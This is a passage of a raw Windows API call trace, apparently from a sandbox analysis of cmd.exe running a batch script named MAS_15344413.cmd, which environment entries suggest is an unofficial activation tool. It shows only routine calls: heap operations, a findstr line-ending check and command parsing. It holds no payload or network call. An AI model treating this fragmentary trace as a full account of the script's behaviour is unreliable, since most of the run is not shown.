returned 0x40 [0175.352] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0175.353] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0175.353] GetProcessHeap () returned 0x19a8f1e0000 [0175.353] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xe6) returned 0x19a8f1fc7a0 [0175.353] GetProcessHeap () returned 0x19a8f1e0000 [0175.353] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1bc) returned 0x19a8f1eabb0 [0175.353] GetProcessHeap () returned 0x19a8f1e0000 [0175.353] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eabb0, Size=0xe8) returned 0x19a8f1eabb0 [0175.353] GetProcessHeap () returned 0x19a8f1e0000 [0175.353] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eabb0) returned 0xe8 [0175.353] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0175.353] GetProcessHeap () returned 0x19a8f1e0000 [0175.353] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1eacb0 [0175.353] GetProcessHeap () returned 0x19a8f1e0000 [0175.353] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eacb0, Size=0x88) returned 0x19a8f1eacb0 [0175.353] GetProcessHeap () returned 0x19a8f1e0000 [0175.353] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eacb0) returned 0x88 [0175.353] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.353] FindFirstFileExW (in: lpFileName="C:\\Windows\\Temp\\findstr.*" (normalized: "c:\\windows\\temp\\findstr.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe1b0) returned 0xffffffffffffffff [0175.354] GetLastError () returned 0x2 [0175.354] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.354] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\findstr.*" (normalized: "c:\\windows\\system32\\findstr.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe1b0) returned 0x19a8f1f8940 [0175.354] FindClose (in: hFindFile=0x19a8f1f8940 | out: hFindFile=0x19a8f1f8940) returned 1 [0175.355] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\findstr.COM" (normalized: "c:\\windows\\system32\\findstr.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe1b0) returned 0xffffffffffffffff [0175.355] GetLastError () returned 0x2 [0175.355] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\findstr.EXE" (normalized: "c:\\windows\\system32\\findstr.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe1b0) returned 0x19a8f1f8b20 [0175.355] FindClose (in: hFindFile=0x19a8f1f8b20 | out: hFindFile=0x19a8f1f8b20) returned 1 [0175.355] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0175.355] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0175.355] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe710, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.356] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f9efe630, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f9efe530 | out: lpAttributeList=0x43f9efe630, lpSize=0x43f9efe530) returned 1 [0175.356] UpdateProcThreadAttribute (in: lpAttributeList=0x43f9efe630, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f9efe51c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f9efe630, lpPreviousValue=0x0) returned 1 [0175.356] GetStartupInfoW (in: lpStartupInfo=0x43f9efe5c0 | out: lpStartupInfo=0x43f9efe5c0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0175.356] GetProcessHeap () returned 0x19a8f1e0000 [0175.356] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb770 [0175.356] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0175.356] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0175.356] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0175.356] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0175.356] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0175.356] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0175.356] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0175.356] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0175.357] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0175.358] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0175.358] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0175.358] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0175.358] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0175.358] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0175.358] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0175.358] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0175.358] GetProcessHeap () returned 0x19a8f1e0000 [0175.358] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0175.358] GetProcessHeap () returned 0x19a8f1e0000 [0175.358] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1ecde0 [0175.359] lstrcmpW (lpString1="\\findstr.exe", lpString2="\\XCOPY.EXE") returned -1 [0175.359] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\findstr.exe", lpCommandLine="findstr /v \"$\" \"MAS_15344413.cmd\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\Temp", lpStartupInfo=0x43f9efe550*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="findstr /v \"$\" \"MAS_15344413.cmd\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f9efe538 | out: lpCommandLine="findstr /v \"$\" \"MAS_15344413.cmd\" ", lpProcessInformation=0x43f9efe538*(hProcess=0x90, hThread=0x98, dwProcessId=0x13b0, dwThreadId=0xcbc)) returned 1 [0175.396] CloseHandle (hObject=0x98) returned 1 [0175.396] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0175.396] GetProcessHeap () returned 0x19a8f1e0000 [0175.397] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0175.397] GetEnvironmentStringsW () returned 0x19a8f1ece20* [0175.397] GetProcessHeap () returned 0x19a8f1e0000 [0175.397] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0e) returned 0x19a8f1eeb50 [0175.397] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ece20, _Size=0xb0e | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0175.397] FreeEnvironmentStringsA (penv="=") returned 1 [0175.397] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0175.580] GetExitCodeProcess (in: hProcess=0x90, lpExitCode=0x43f9efe4b8 | out: lpExitCode=0x43f9efe4b8*=0x1) returned 1 [0175.580] CloseHandle (hObject=0x90) returned 1 [0175.580] _vsnwprintf (in: _Buffer=0x43f9efe678, _BufferCount=0x13, _Format="%08X", _ArgList=0x43f9efe4c8 | out: _Buffer="00000001") returned 8 [0175.580] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0175.580] GetProcessHeap () returned 0x19a8f1e0000 [0175.581] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0175.581] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0175.581] GetProcessHeap () returned 0x19a8f1e0000 [0175.581] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb34) returned 0x19a8f1ef690 [0175.581] memcpy (in: _Dst=0x19a8f1ef690, _Src=0x19a8f1eeb50, _Size=0xb34 | out: _Dst=0x19a8f1ef690) returned 0x19a8f1ef690 [0175.581] FreeEnvironmentStringsA (penv="=") returned 1 [0175.581] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0175.581] GetProcessHeap () returned 0x19a8f1e0000 [0175.582] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef690) returned 1 [0175.582] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0175.582] GetProcessHeap () returned 0x19a8f1e0000 [0175.582] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb34) returned 0x19a8f1ef690 [0175.582] memcpy (in: _Dst=0x19a8f1ef690, _Src=0x19a8f1eeb50, _Size=0xb34 | out: _Dst=0x19a8f1ef690) returned 0x19a8f1ef690 [0175.582] FreeEnvironmentStringsA (penv="=") returned 1 [0175.582] GetProcessHeap () returned 0x19a8f1e0000 [0175.582] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecde0) returned 1 [0175.582] DeleteProcThreadAttributeList (in: lpAttributeList=0x43f9efe630 | out: lpAttributeList=0x43f9efe630) [0175.582] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0175.582] _close (_FileHandle=3) returned 0 [0175.582] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.582] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.583] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.583] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.583] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.583] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.584] SetConsoleInputExeNameW () returned 0x1 [0175.584] GetConsoleOutputCP () returned 0x1b5 [0175.584] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.584] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.584] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10 [0175.585] _open_osfhandle (_OSFileHandle=0x10, _Flags=8) returned 3 [0175.585] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.585] SetFilePointer (in: hFile=0x10, lDistanceToMove=2735, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xaaf [0175.585] GetProcessHeap () returned 0x19a8f1e0000 [0175.585] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eacb0) returned 1 [0175.585] GetProcessHeap () returned 0x19a8f1e0000 [0175.586] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eabb0) returned 1 [0175.586] GetProcessHeap () returned 0x19a8f1e0000 [0175.586] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fc7a0) returned 1 [0175.586] GetProcessHeap () returned 0x19a8f1e0000 [0175.587] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea4b0) returned 1 [0175.587] GetProcessHeap () returned 0x19a8f1e0000 [0175.587] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8760) returned 1 [0175.587] GetProcessHeap () returned 0x19a8f1e0000 [0175.588] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e1e70) returned 1 [0175.588] GetProcessHeap () returned 0x19a8f1e0000 [0175.588] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0175.588] GetProcessHeap () returned 0x19a8f1e0000 [0175.588] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec800) returned 1 [0175.588] GetProcessHeap () returned 0x19a8f1e0000 [0175.588] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0175.588] GetProcessHeap () returned 0x19a8f1e0000 [0175.589] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee490) returned 1 [0175.589] GetProcessHeap () returned 0x19a8f1e0000 [0175.589] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee010) returned 1 [0175.589] GetProcessHeap () returned 0x19a8f1e0000 [0175.589] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0175.589] GetProcessHeap () returned 0x19a8f1e0000 [0175.589] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee550) returned 1 [0175.589] GetProcessHeap () returned 0x19a8f1e0000 [0175.590] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0175.590] GetProcessHeap () returned 0x19a8f1e0000 [0175.590] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc80) returned 1 [0175.590] GetProcessHeap () returned 0x19a8f1e0000 [0175.590] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0b70) returned 1 [0175.590] GetProcessHeap () returned 0x19a8f1e0000 [0175.591] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e09f0) returned 1 [0175.591] GetProcessHeap () returned 0x19a8f1e0000 [0175.591] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0175.591] GetProcessHeap () returned 0x19a8f1e0000 [0175.591] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0175.591] GetProcessHeap () returned 0x19a8f1e0000 [0175.592] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0175.592] GetProcessHeap () returned 0x19a8f1e0000 [0175.592] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0175.592] GetProcessHeap () returned 0x19a8f1e0000 [0175.592] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0175.592] GetProcessHeap () returned 0x19a8f1e0000 [0175.593] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0175.593] GetProcessHeap () returned 0x19a8f1e0000 [0175.593] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0175.593] GetProcessHeap () returned 0x19a8f1e0000 [0175.593] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0175.593] GetProcessHeap () returned 0x19a8f1e0000 [0175.594] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0175.594] GetProcessHeap () returned 0x19a8f1e0000 [0175.594] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0175.594] GetProcessHeap () returned 0x19a8f1e0000 [0175.597] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0175.597] GetProcessHeap () returned 0x19a8f1e0000 [0175.597] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0175.597] GetProcessHeap () returned 0x19a8f1e0000 [0175.598] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0175.598] GetProcessHeap () returned 0x19a8f1e0000 [0175.598] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0175.598] GetProcessHeap () returned 0x19a8f1e0000 [0175.598] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8fa0) returned 1 [0175.598] GetProcessHeap () returned 0x19a8f1e0000 [0175.599] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0175.599] GetProcessHeap () returned 0x19a8f1e0000 [0175.599] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0175.599] GetProcessHeap () returned 0x19a8f1e0000 [0175.599] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5950) returned 1 [0175.599] GetProcessHeap () returned 0x19a8f1e0000 [0175.600] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e09b0) returned 1 [0175.600] GetProcessHeap () returned 0x19a8f1e0000 [0175.600] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0b30) returned 1 [0175.600] GetProcessHeap () returned 0x19a8f1e0000 [0175.601] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8b80) returned 1 [0175.601] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.601] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaaf [0175.601] ReadFile (in: hFile=0x10, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.601] SetFilePointer (in: hFile=0x10, lDistanceToMove=2741, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xab5 [0175.601] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="popd\r\n", cbMultiByte=6, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="popd\r\nb\r\n0.0.1 -n 6 >nul\r\nhas LF line ending issue or an empty line at the end of the script is missing.\r\n================================\r\n") returned 6 [0175.601] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.601] GetFileType (hFile=0x10) returned 0x1 [0175.601] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.601] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xab5 [0175.601] GetProcessHeap () returned 0x19a8f1e0000 [0175.601] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fd1c0 [0175.602] GetProcessHeap () returned 0x19a8f1e0000 [0175.602] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fd1c0) returned 1 [0175.602] _wcsicmp (_String1="popd", _String2=")") returned 71 [0175.602] _wcsicmp (_String1="FOR", _String2="popd") returned -10 [0175.602] _wcsicmp (_String1="FOR/?", _String2="popd") returned -10 [0175.602] _wcsicmp (_String1="IF", _String2="popd") returned -7 [0175.602] _wcsicmp (_String1="IF/?", _String2="popd") returned -7 [0175.602] _wcsicmp (_String1="REM", _String2="popd") returned 2 [0175.602] _wcsicmp (_String1="REM/?", _String2="popd") returned 2 [0175.602] GetProcessHeap () returned 0x19a8f1e0000 [0175.602] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0175.603] GetProcessHeap () returned 0x19a8f1e0000 [0175.603] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb860 [0175.603] _tell (_FileHandle=3) returned 2741 [0175.603] _close (_FileHandle=3) returned 0 [0175.603] _wcsicmp (_String1="popd", _String2="DIR") returned 12 [0175.603] _wcsicmp (_String1="popd", _String2="ERASE") returned 11 [0175.603] _wcsicmp (_String1="popd", _String2="DEL") returned 12 [0175.603] _wcsicmp (_String1="popd", _String2="TYPE") returned -4 [0175.603] _wcsicmp (_String1="popd", _String2="COPY") returned 13 [0175.603] _wcsicmp (_String1="popd", _String2="CD") returned 13 [0175.603] _wcsicmp (_String1="popd", _String2="CHDIR") returned 13 [0175.603] _wcsicmp (_String1="popd", _String2="RENAME") returned -2 [0175.603] _wcsicmp (_String1="popd", _String2="REN") returned -2 [0175.603] _wcsicmp (_String1="popd", _String2="ECHO") returned 11 [0175.603] _wcsicmp (_String1="popd", _String2="SET") returned -3 [0175.603] _wcsicmp (_String1="popd", _String2="PAUSE") returned 14 [0175.603] _wcsicmp (_String1="popd", _String2="DATE") returned 12 [0175.603] _wcsicmp (_String1="popd", _String2="TIME") returned -4 [0175.604] _wcsicmp (_String1="popd", _String2="PROMPT") returned -3 [0175.604] _wcsicmp (_String1="popd", _String2="MD") returned 3 [0175.604] _wcsicmp (_String1="popd", _String2="MKDIR") returned 3 [0175.604] _wcsicmp (_String1="popd", _String2="RD") returned -2 [0175.604] _wcsicmp (_String1="popd", _String2="RMDIR") returned -2 [0175.604] _wcsicmp (_String1="popd", _String2="PATH") returned 14 [0175.604] _wcsicmp (_String1="popd", _String2="GOTO") returned 9 [0175.604] _wcsicmp (_String1="popd", _String2="SHIFT") returned -3 [0175.604] _wcsicmp (_String1="popd", _String2="CLS") returned 13 [0175.604] _wcsicmp (_String1="popd", _String2="CALL") returned 13 [0175.604] _wcsicmp (_String1="popd", _String2="VERIFY") returned -6 [0175.604] _wcsicmp (_String1="popd", _String2="VER") returned -6 [0175.604] _wcsicmp (_String1="popd", _String2="VOL") returned -6 [0175.604] _wcsicmp (_String1="popd", _String2="EXIT") returned 11 [0175.604] _wcsicmp (_String1="popd", _String2="SETLOCAL") returned -3 [0175.604] _wcsicmp (_String1="popd", _String2="ENDLOCAL") returned 11 [0175.604] _wcsicmp (_String1="popd", _String2="TITLE") returned -4 [0175.604] _wcsicmp (_String1="popd", _String2="START") returned -3 [0175.604] _wcsicmp (_String1="popd", _String2="DPATH") returned 12 [0175.604] _wcsicmp (_String1="popd", _String2="KEYS") returned 5 [0175.604] _wcsicmp (_String1="popd", _String2="MOVE") returned 3 [0175.604] _wcsicmp (_String1="popd", _String2="PUSHD") returned -6 [0175.604] _wcsicmp (_String1="popd", _String2="POPD") returned 0 [0175.604] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.605] _wcsicmp (_String1="popd", _String2="DIR") returned 12 [0175.605] _wcsicmp (_String1="popd", _String2="ERASE") returned 11 [0175.605] _wcsicmp (_String1="popd", _String2="DEL") returned 12 [0175.605] _wcsicmp (_String1="popd", _String2="TYPE") returned -4 [0175.605] _wcsicmp (_String1="popd", _String2="COPY") returned 13 [0175.605] _wcsicmp (_String1="popd", _String2="CD") returned 13 [0175.605] _wcsicmp (_String1="popd", _String2="CHDIR") returned 13 [0175.605] _wcsicmp (_String1="popd", _String2="RENAME") returned -2 [0175.605] _wcsicmp (_String1="popd", _String2="REN") returned -2 [0175.605] _wcsicmp (_String1="popd", _String2="ECHO") returned 11 [0175.606] _wcsicmp (_String1="popd", _String2="SET") returned -3 [0175.606] _wcsicmp (_String1="popd", _String2="PAUSE") returned 14 [0175.606] _wcsicmp (_String1="popd", _String2="DATE") returned 12 [0175.606] _wcsicmp (_String1="popd", _String2="TIME") returned -4 [0175.606] _wcsicmp (_String1="popd", _String2="PROMPT") returned -3 [0175.606] _wcsicmp (_String1="popd", _String2="MD") returned 3 [0175.606] _wcsicmp (_String1="popd", _String2="MKDIR") returned 3 [0175.606] _wcsicmp (_String1="popd", _String2="RD") returned -2 [0175.606] _wcsicmp (_String1="popd", _String2="RMDIR") returned -2 [0175.606] _wcsicmp (_String1="popd", _String2="PATH") returned 14 [0175.606] _wcsicmp (_String1="popd", _String2="GOTO") returned 9 [0175.606] _wcsicmp (_String1="popd", _String2="SHIFT") returned -3 [0175.606] _wcsicmp (_String1="popd", _String2="CLS") returned 13 